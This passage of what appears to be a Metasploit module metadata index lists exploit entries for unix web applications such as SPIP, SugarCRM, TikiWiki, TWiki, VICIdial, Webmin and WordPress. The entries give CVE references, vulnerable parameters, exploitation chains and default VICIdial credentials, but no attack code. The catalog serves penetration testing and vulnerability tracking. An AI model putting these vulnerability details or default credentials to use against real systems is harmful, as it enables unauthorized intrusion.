"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/sphpblog_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sphpblog_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/spip_connect_exec": {
"name": "SPIP connect Parameter PHP Injection",
"full_name": "exploit/unix/webapp/spip_connect_exec",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"Arnaud Pachot",
"Frederic Cikala",
"Davy Douhine"
],
"description": "This module exploits a PHP code injection in SPIP. The vulnerability exists in the\n connect parameter and allows an unauthenticated user to execute arbitrary commands\n with web user privileges. Branches 2.0, 2.1 and 3 are concerned. Vulnerable versions\n are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and\n has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu\n and Fedora linux distributions.",
"references": [
"OSVDB-83543",
"BID-54292",
"URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/spip_connect_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/spip_connect_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/squash_yaml_exec": {
"name": "Squash YAML Code Execution",
"full_name": "exploit/unix/webapp/squash_yaml_exec",
"rank": 600,
"disclosure_date": "2013-08-06",
"type": "exploit",
"author": [
"Charlie Eriksen"
],
"description": "This module exploits a remote code execution vulnerability in the\n YAML request processor of the Squash application.",
"references": [
"URL-http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/",
"OSVDB-95992",
"CVE-2013-5036"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/squash_yaml_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/squash_yaml_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/squirrelmail_pgp_plugin": {
"name": "SquirrelMail PGP Plugin Command Execution (SMTP)",
"full_name": "exploit/unix/webapp/squirrelmail_pgp_plugin",
"rank": 0,
"disclosure_date": "2007-07-09",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>"
],
"description": "This module exploits a command execution vulnerability in the\n PGP plugin of SquirrelMail. This flaw was found while quickly\n grepping the code after release of some information at\n http://www.wslabi.com/. Later, iDefense published an advisory ....\n\n Reading an email in SquirrelMail with the PGP plugin activated\n is enough to compromise the underlying server.\n\n Only \"cmd/unix/generic\" payloads were tested.",
"references": [
"CVE-2003-0990",
"OSVDB-3178",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330",
"URL-http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"SquirrelMail PGP plugin < 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb",
"is_install_path": true,
"ref_name": "unix/webapp/squirrelmail_pgp_plugin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sugarcrm_rest_unserialize_exec": {
"name": "SugarCRM REST Unserialize PHP Code Execution",
"full_name": "exploit/unix/webapp/sugarcrm_rest_unserialize_exec",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n the permissions of the webserver. The dangerous unserialize() call exists in the\n '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()\n method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.",
"references": [
"URL-http://karmainsecurity.com/KIS-2016-07",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-001",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-008",
"URL-https://bugs.php.net/bug.php?id=72663"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SugarCRM CE <= 6.5.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sugarcrm_rest_unserialize_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sugarcrm_unserialize_exec": {
"name": "SugarCRM unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/sugarcrm_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-06-23",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1\n which could be abused to allow authenticated SugarCRM users to execute arbitrary\n code with the permissions of the webserver.\n\n The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'\n script, which is called with user controlled data from the 'current_query_by_page'\n parameter. The exploit abuses the __destruct() method from the SugarTheme class\n to write arbitrary PHP code to a 'pathCache.php' on the web root.",
"references": [
"CVE-2012-0694",
"OSVDB-83361",
"EDB-19381",
"URL-http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sugarcrm_unserialize_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_graph_formula_exec": {
"name": "TikiWiki tiki-graph_formula Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/tikiwiki_graph_formula_exec",
"rank": 600,
"disclosure_date": "2007-10-10",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "TikiWiki (<= 1.9.8) contains a flaw that may allow a remote\n attacker to execute arbitrary PHP code. The issue is due to\n 'tiki-graph_formula.php' script not properly sanitizing user\n input supplied to create_function(), which may allow a remote\n attacker to execute arbitrary PHP code resulting in a loss of\n integrity.",
"references": [
"CVE-2007-5423",
"OSVDB-40478",
"BID-26006"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_graph_formula_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_jhot_exec": {
"name": "TikiWiki jhot Remote Command Execution",
"full_name": "exploit/unix/webapp/tikiwiki_jhot_exec",
"rank": 600,
"disclosure_date": "2006-09-02",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "TikiWiki contains a flaw that may allow a malicious user to execute\n arbitrary PHP code. The issue is triggered due to the jhot.php script\n not correctly verifying uploaded files. It is possible that the flaw\n may allow arbitrary PHP code execution by uploading a malicious PHP\n script resulting in a loss of integrity.\n\n The vulnerability was reported in Tikiwiki version 1.9.4.",
"references": [
"CVE-2006-4602",
"OSVDB-28456",
"BID-19819",
"URL-http://secunia.com/advisories/21733/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_jhot_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_unserialize_exec": {
"name": "Tiki Wiki unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/tikiwiki_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the webserver user.\n\n The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,\n which is called with user controlled data from the 'printpages' parameter.\n The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy\n class to write arbitrary PHP code to a file on the Tiki Wiki web directory.\n\n In order to run successfully three conditions must be satisfied (1) display_errors\n php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki\n Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php\n version older than 5.3.4 must be used to allow poison null bytes in filesystem related\n functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.",
"references": [
"CVE-2012-0911",
"OSVDB-83534",
"BID-54298",
"EDB-19573",
"URL-http://dev.tiki.org/item4109"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_unserialize_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_upload_exec": {
"name": "Tiki Wiki Unauthenticated File Upload Vulnerability",
"full_name": "exploit/unix/webapp/tikiwiki_upload_exec",
"rank": 600,
"disclosure_date": "2016-07-11",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a file upload vulnerability in Tiki Wiki <= 15.1\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the web server user.\n\n The issue comes with one of the 3rd party components. Name of that component is\n ELFinder -version 2.0-. This component comes with default example page which\n demonstrates file operations such as upload, remove, rename, create directory etc.\n Default configuration does not force validations such as file extension, content-type etc.\n Thus, unauthenticated user can upload PHP file.\n\n The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.",
"references": [
"URL-https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability",
"URL-https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/trixbox_langchoice": {
"name": "Trixbox langChoice PHP Local File Inclusion",
"full_name": "exploit/unix/webapp/trixbox_langchoice",
"rank": 0,
"disclosure_date": "2008-07-09",
"type": "exploit",
"author": [
"chao-mu"
],
"description": "This module injects php into the trixbox session file and then, in a second call, evaluates\n that code by manipulating the langChoice parameter as described in OSVDB-50421.",
"references": [
"OSVDB-50421",
"CVE-2008-6825",
"BID-30135",
"EDB-6026",
"URL-http://www.trixbox.org/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"trixbox CE 2.6.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/trixbox_langchoice.rb",
"is_install_path": true,
"ref_name": "unix/webapp/trixbox_langchoice",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tuleap_rest_unserialize_exec": {
"name": "Tuleap 9.6 Second-Order PHP Object Injection",
"full_name": "exploit/unix/webapp/tuleap_rest_unserialize_exec",
"rank": 600,
"disclosure_date": "2017-10-23",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a Second-Order PHP Object Injection vulnerability in Tuleap <= 9.6 which\n could be abused by authenticated users to execute arbitrary PHP code with the permissions of the\n webserver. The vulnerability exists because of the User::getRecentElements() method is using the\n unserialize() function with data that can be arbitrarily manipulated by a user through the REST\n API interface. The exploit's POP chain abuses the __toString() method from the Mustache class\n to reach a call to eval() in the Transition_PostActionSubFactory::fetchPostActions() method.",
"references": [
"URL-http://karmainsecurity.com/KIS-2017-02",
"URL-https://tuleap.net/plugins/tracker/?aid=10118",
"CVE-2017-7411"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Tuleap <= 9.6"
],
"mod_time": "2017-12-18 03:15:33 +0000",
"path": "/modules/exploits/unix/webapp/tuleap_rest_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tuleap_rest_unserialize_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tuleap_unserialize_exec": {
"name": "Tuleap PHP Unserialize Code Execution",
"full_name": "exploit/unix/webapp/tuleap_unserialize_exec",
"rank": 600,
"disclosure_date": "2014-11-27",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be\n abused to allow authenticated users to execute arbitrary code with the permissions of the\n web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'\n file. The exploit abuses the destructor method from the Jabbex class in order to reach a\n call_user_func_array() call in the Jabber class and call the fetchPostActions() method from\n the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In\n order to work, the target must have the 'sys_create_project_in_one_step' option disabled.",
"references": [
"CVE-2014-8791",
"URL-http://karmainsecurity.com/KIS-2014-13",
"URL-https://tuleap.net/plugins/tracker/?aid=7601"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-12-20 13:10:42 +0000",
"path": "/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tuleap_unserialize_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_history": {
"name": "TWiki History TWikiUsers rev Parameter Command Execution",
"full_name": "exploit/unix/webapp/twiki_history",
"rank": 600,
"disclosure_date": "2005-09-14",
"type": "exploit",
"author": [
"B4dP4nd4",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the history component of TWiki.\n By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers\n script, an attacker can execute arbitrary OS commands.",
"references": [
"CVE-2005-2877",
"OSVDB-19403",
"BID-14834",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/twiki_history.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_history",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_maketext": {
"name": "TWiki MAKETEXT Remote Command Execution",
"full_name": "exploit/unix/webapp/twiki_maketext",
"rank": 600,
"disclosure_date": "2012-12-15",
"type": "exploit",
"author": [
"George Clark",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.",
"references": [
"CVE-2012-6329",
"OSVDB-88460",
"BID-56950",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/twiki_maketext.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_maketext",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_search": {
"name": "TWiki Search Function Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/twiki_search",
"rank": 600,
"disclosure_date": "2004-10-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the search component of TWiki.\n By passing a 'search' parameter containing shell metacharacters to the\n 'WebSearch' script, an attacker can execute arbitrary OS commands.",
"references": [
"CVE-2004-1037",
"OSVDB-11714",
"BID-11674",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/twiki_search.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_search",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/vbulletin_vote_sqli_exec": {
"name": "vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",
"full_name": "exploit/unix/webapp/vbulletin_vote_sqli_exec",
"rank": 600,
"disclosure_date": "2013-03-25",
"type": "exploit",
"author": [
"Orestis Kourides",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has\n been used in the wild since March 2013. This module uses the sqli to extract the\n web application's usernames and hashes. With the retrieved information tries to\n log into the admin control panel in order to deploy the PHP payload. This module\n has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu\n Linux distribution.",
"references": [
"CVE-2013-3522",
"OSVDB-92031",
"EDB-24882",
"BID-58754",
"URL-http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vBulletin 5.0.0 Beta 11-28"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vbulletin_vote_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/vicidial_manager_send_cmd_exec": {
"name": "VICIdial Manager Send OS Command Injection",
"full_name": "exploit/unix/webapp/vicidial_manager_send_cmd_exec",
"rank": 600,
"disclosure_date": "2013-10-23",
"type": "exploit",
"author": [
"Adam Caudill <adam@adamcaudill.com>",
"AverageSecurityGuy <stephen@averagesecurityguy.info>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The file agc/manager_send.php in the VICIdial web application uses\n unsanitized user input as part of a command that is executed using the PHP\n passthru() function. A valid username, password and session are needed to access\n the injection point. Fortunately, VICIdial has two built-in accounts with default\n passwords and the manager_send.php file has a SQL injection vulnerability that can\n be used to bypass the session check as long as at least one session has been\n created at some point in time. In case there isn't any valid session, the user can\n provide astGUIcient credentials in order to create one. The results of the injected\n commands are returned as part of the response from the web server. Affected versions\n include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The\n default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.",
"references": [
"CVE-2013-4467",
"CVE-2013-4468",
"OSVDB-98903",
"OSVDB-98902",
"BID-63340",
"BID-63288",
"URL-http://www.openwall.com/lists/oss-security/2013/10/23/10",
"URL-http://adamcaudill.com/2013/10/23/vicidial-multiple-vulnerabilities/"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vicidial_manager_send_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/vicidial_user_authorization_unauth_cmd_exec": {
"name": "VICIdial user_authorization Unauthenticated Command Execution",
"full_name": "exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
"rank": 600,
"disclosure_date": "2017-05-26",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in VICIdial versions\n 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users\n to execute arbitrary operating system commands as the web\n server user if password encryption is enabled (disabled\n by default).\n\n When password encryption is enabled the user's password\n supplied using HTTP basic authentication is used in a call\n to exec().\n\n This module has been tested successfully on version 2.11 RC2\n and 2.13 RC1 on CentOS.",
"references": [
"URL-http://www.vicidial.org/VICIDIALmantis/view.php?id=1016"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webmin_show_cgi_exec": {
"name": "Webmin /file/show.cgi Remote Command Execution",
"full_name": "exploit/unix/webapp/webmin_show_cgi_exec",
"rank": 600,
"disclosure_date": "2012-09-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in Webmin\n 1.580. The vulnerability exists in the /file/show.cgi component and allows an\n authenticated user, with access to the File Manager Module, to execute arbitrary\n commands with root privileges. The module has been tested successfully with Webmin\n 1.580 over Ubuntu 10.04.",
"references": [
"OSVDB-85248",
"BID-55446",
"CVE-2012-2982",
"URL-http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf",
"URL-https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Webmin 1.580"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webmin_show_cgi_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webmin_upload_exec": {
"name": "Webmin Upload Authenticated RCE",
"full_name": "exploit/unix/webapp/webmin_upload_exec",
"rank": 600,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"AkkuS <Özkan Mustafa Akkuş>",
"Ziconius <Kris.Anderson@immersivelabs.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in Webmin\n 1.900 and lower versions. Any user authorized to the \"Upload and Download\"\n module can execute arbitrary commands with root privileges.\n\n In addition, if the 'Running Processes' (proc) privilege is set the user can\n accurately determine which directory to upload to. Webmin application files\n can be written/overwritten, which allows remote code execution. The module\n has been tested successfully with Webmin 1.900 on Ubuntu v18.04.\n\n Using GUESSUPLOAD attempts to use a default installation path in order to\n trigger the exploit.",
"references": [
"CVE-2019-9624",
"EDB-46201",
"URL-https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Webmin <= 1.900"
],
"mod_time": "2019-03-21 11:28:45 +0000",
"path": "/modules/exploits/unix/webapp/webmin_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webmin_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webtester_exec": {
"name": "WebTester 5.x Command Execution",
"full_name": "exploit/unix/webapp/webtester_exec",
"rank": 600,
"disclosure_date": "2013-10-17",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in WebTester\n version 5.x. The 'install2.php' file allows unauthenticated users to\n execute arbitrary commands in the 'cpusername', 'cppassword' and\n 'cpdomain' parameters.",
"references": [
"OSVDB-98750",
"URL-https://sourceforge.net/p/webtesteronline/bugs/3/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebTester version 5.x"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/webtester_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webtester_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_admin_shell_upload": {
"name": "WordPress Admin Shell Upload",
"full_name": "exploit/unix/webapp/wp_admin_shell_upload",
"rank": 600,
"disclosure_date": "2015-02-21",
"type": "exploit",
"author": [
"rastating"
],
"description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running WordPress providing valid\n admin credentials are used.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_admin_shell_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_admin_shell_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_advanced_custom_fields_exec": {
"name": "WordPress Plugin Advanced Custom Fields Remote File Inclusion",
"full_name": "exploit/unix/webapp/wp_advanced_custom_fields_exec",
"rank": 600,
"disclosure_date": "2012-11-14",
"type": "exploit",
"author": [
"Charlie Eriksen <charlie@ceriksen.com>"
],
"description": "This module exploits a remote file inclusion flaw in the WordPress blogging\n software plugin known as Advanced Custom Fields. The vulnerability allows for remote\n file inclusion and remote code execution via the export.php script. The Advanced\n Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only\n works when the php option allow_url_include is set to On (Default Off).",
"references": [
"OSVDB-87353",
"URL-http://secunia.com/advisories/51037/",
"WPVDB-6103"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_advanced_custom_fields_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_ajax_load_more_file_upload": {
